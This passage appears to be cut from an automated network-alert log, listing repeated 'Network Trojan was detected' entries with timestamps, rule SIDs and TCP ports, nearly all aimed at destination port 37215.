              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694235
              SID:2829579
              Source Port:38756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726810
              SID:2835222
              Source Port:50368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343541
              SID:2835222
              Source Port:40178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294752
              SID:2829579
              Source Port:43296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267569
              SID:2835222
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132744
              SID:2835222
              Source Port:44326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213421
              SID:2829579
              Source Port:46936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310428
              SID:2829579
              Source Port:58456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453592
              SID:2835222
              Source Port:58692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151723
              SID:2835222
              Source Port:43450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784599
              SID:2829579
              Source Port:34808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545722
              SID:2829579
              Source Port:50064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154164
              SID:2835222
              Source Port:33326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451562
              SID:2835222
              Source Port:43302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273221
              SID:2835222
              Source Port:47988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550215
              SID:2829579
              Source Port:50802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246931
              SID:2829579
              Source Port:47012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153156
              SID:2835222
              Source Port:57114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992916
              SID:2829579
              Source Port:43674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297111
              SID:2835222
              Source Port:34698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556086
              SID:2829579
              Source Port:52656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453106
              SID:2835222
              Source Port:40562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323857
              SID:2829579
              Source Port:55314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785487
              SID:2829579
              Source Port:60338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269043
              SID:2835222
              Source Port:47292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089297
              SID:2829579
              Source Port:39478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416554
              SID:2829579
              Source Port:48208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109138
              SID:2835222
              Source Port:54346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246172
              SID:2835222
              Source Port:35692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.073814
              SID:2840516
              Source Port:4554
              Destination Port:39994
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124137
              SID:2835222
              Source Port:44336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125674
              SID:2829579
              Source Port:46514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802528
              SID:2829579
              Source Port:56340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300534
              SID:2829579
              Source Port:58172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613753
              SID:2829579
              Source Port:58214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042161
              SID:2835222
              Source Port:42160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801205
              SID:2829579
              Source Port:32840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153978
              SID:2829579
              Source Port:60250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614795
              SID:2835222
              Source Port:60082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697487
              SID:2829579
              Source Port:50544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096958
              SID:2829579
              Source Port:50010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157979
              SID:2829579
              Source Port:52970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676180
              SID:2835222
              Source Port:33920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195053
              SID:2829579
              Source Port:38876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724425
              SID:2829579
              Source Port:42228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125507
              SID:2829579
              Source Port:34924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784700
              SID:2829579
              Source Port:32920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223443
              SID:2829579
              Source Port:41106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884550
              SID:2835222
              Source Port:55544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970476
              SID:2835222
              Source Port:40044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320461
              SID:2829579
              Source Port:40480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823206
              SID:2829579
              Source Port:35302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092534
              SID:2835222
              Source Port:36094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731143
              SID:2829579
              Source Port:35004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093697
              SID:2835222
              Source Port:45050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802881
              SID:2829579
              Source Port:52852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509937
              SID:2835222
              Source Port:38980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089429
              SID:2835222
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151051
              SID:2829579
              Source Port:37564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044467
              SID:2835222
              Source Port:48854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170676
              SID:2835222
              Source Port:50876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507566
              SID:2835222
              Source Port:39290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097113
              SID:2829579
              Source Port:35230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255101
              SID:2835222
              Source Port:60900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197820
              SID:2835222
              Source Port:36920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842196
              SID:2829579
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657121
              SID:2829579
              Source Port:59320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155040
              SID:2829579
              Source Port:53914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991992
              SID:2835222
              Source Port:46764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041698
              SID:2835222
              Source Port:42254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756018
              SID:2835222
              Source Port:37248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130362
              SID:2829579
              Source Port:40372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781041
              SID:2835222
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679141
              SID:2835222
              Source Port:40992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376864
              SID:2829579
              Source Port:56254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678020
              SID:2835222
              Source Port:35016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505564
              SID:2829579
              Source Port:42556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754685
              SID:2835222
              Source Port:45688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309927
              SID:2829579
              Source Port:55870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708902
              SID:2835222
              Source Port:38032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988940
              SID:2835222
              Source Port:52924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256181
              SID:2835222
              Source Port:43814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694647
              SID:2829579
              Source Port:39198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724706
              SID:2829579
              Source Port:53604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177850
              SID:2835222
              Source Port:58560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244749
              SID:2835222
              Source Port:44940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270943
              SID:2829579
              Source Port:56376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655126
              SID:2829579
              Source Port:49270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272847
              SID:2835222
              Source Port:40256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942670
              SID:2835222
              Source Port:37932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439129
              SID:2829579
              Source Port:56216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417201
              SID:2829579
              Source Port:38836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837133
              SID:2829579
              Source Port:50916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610329
              SID:2829579
              Source Port:49978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528369
              SID:2835222
              Source Port:59034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016383
              SID:2835222
              Source Port:34576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886379
              SID:2835222
              Source Port:52264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.199959
              SID:2829579
              Source Port:46058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027925
              SID:2829579
              Source Port:60848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129975
              SID:2835222
              Source Port:52054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504108
              SID:2829579
              Source Port:56992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417044
              SID:2835222
              Source Port:54344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.037871
              SID:2829579
              Source Port:41314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338960
              SID:2835222
              Source Port:56546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210302
              SID:2835222
              Source Port:56900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181544
              SID:2835222
              Source Port:57358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196222
              SID:2835222
              Source Port:50924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869528
              SID:2829579
              Source Port:57148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509596
              SID:2829579
              Source Port:59802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488311
              SID:2829579
              Source Port:35876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510181
              SID:2829579
              Source Port:43582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276570
              SID:2829579
              Source Port:48636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242877
              SID:2835222
              Source Port:44354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369124
              SID:2835222
              Source Port:35360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136252
              SID:2829579
              Source Port:33178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730578
              SID:2829579
              Source Port:45706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973790
              SID:2835222
              Source Port:37506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359002
              SID:2829579
              Source Port:35742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938065
              SID:2829579
              Source Port:36056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211122
              SID:2829579
              Source Port:48658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276292
              SID:2829579
              Source Port:43284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508481
              SID:2829579
              Source Port:59930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013793
              SID:2835222
              Source Port:49474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278237
              SID:2829579
              Source Port:59202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420462
              SID:2829579
              Source Port:45640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307618
              SID:2829579
              Source Port:46412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942166
              SID:2829579
              Source Port:53342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605202
              SID:2835222
              Source Port:45958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758696
              SID:2835222
              Source Port:45642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977831
              SID:2829579
              Source Port:60772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549940
              SID:2829579
              Source Port:41902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223779
              SID:2829579
              Source Port:53212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135658
              SID:2829579
              Source Port:37498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570620
              SID:2829579
              Source Port:35974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726460
              SID:2835222
              Source Port:57254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196505
              SID:2835222
              Source Port:35416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151667
              SID:2835222
              Source Port:58628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454105
              SID:2835222
              Source Port:35716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527835
              SID:2835222
              Source Port:43518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153751
              SID:2835222
              Source Port:58290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568652
              SID:2829579
              Source Port:43016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453511
              SID:2835222
              Source Port:36202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440590
              SID:2829579
              Source Port:47914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198861
              SID:2829579
              Source Port:49440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101929
              SID:2835222
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102012
              SID:2829579
              Source Port:58872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129259
              SID:2835222
              Source Port:54116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609684
              SID:2829579
              Source Port:35544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424305
              SID:2829579
              Source Port:38566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198314
              SID:2829579
              Source Port:58830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914612
              SID:2835222
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458461
              SID:2829579
              Source Port:43224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870696
              SID:2835222
              Source Port:50904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192193
              SID:2829579
              Source Port:55272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264796
              SID:2829579
              Source Port:40946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.324031
              SID:2829579
              Source Port:60464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421653
              SID:2829579
              Source Port:57718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272626
              SID:2835222
              Source Port:39448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757801
              SID:2829579
              Source Port:35810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210596
              SID:2835222
              Source Port:35616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989006
              SID:2835222
              Source Port:53418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803857
              SID:2835222
              Source Port:59410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041046
              SID:2829579
              Source Port:56740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039946
              SID:2829579
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042813
              SID:2835222
              Source Port:42424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695945
              SID:2835222
              Source Port:44592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757610
              SID:2835222
              Source Port:51332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196471
              SID:2835222
              Source Port:47912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452207
              SID:2835222
              Source Port:56008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418132
              SID:2829579
              Source Port:37204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832513
              SID:2835222
              Source Port:36916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509093
              SID:2829579
              Source Port:34914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048251
              SID:2829579
              Source Port:39280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913860
              SID:2829579
              Source Port:57724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523972
              SID:2835222
              Source Port:36930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914628
              SID:2829579
              Source Port:38220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759199
              SID:2835222
              Source Port:46080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678161
              SID:2829579
              Source Port:43310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136223
              SID:2835222
              Source Port:55014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568688
              SID:2829579
              Source Port:53006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374502
              SID:2829579
              Source Port:49592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.454386
              SID:2829579
              Source Port:52170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301523
              SID:2829579
              Source Port:56560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611273
              SID:2829579
              Source Port:48840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.907277
              SID:2835222
              Source Port:49134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913441
              SID:2835222
              Source Port:60824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611328
              SID:2829579
              Source Port:45628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969406
              SID:2829579
              Source Port:56598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013336
              SID:2835222
              Source Port:41908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505459
              SID:2835222
              Source Port:59150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092411
              SID:2829579
              Source Port:35904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727107
              SID:2835222
              Source Port:58942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.479916
              SID:2835222
              Source Port:51526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013604
              SID:2829579
              Source Port:60968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754764
              SID:2835222
              Source Port:51564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439220
              SID:2835222
              Source Port:45382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990801
              SID:2829579
              Source Port:37782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
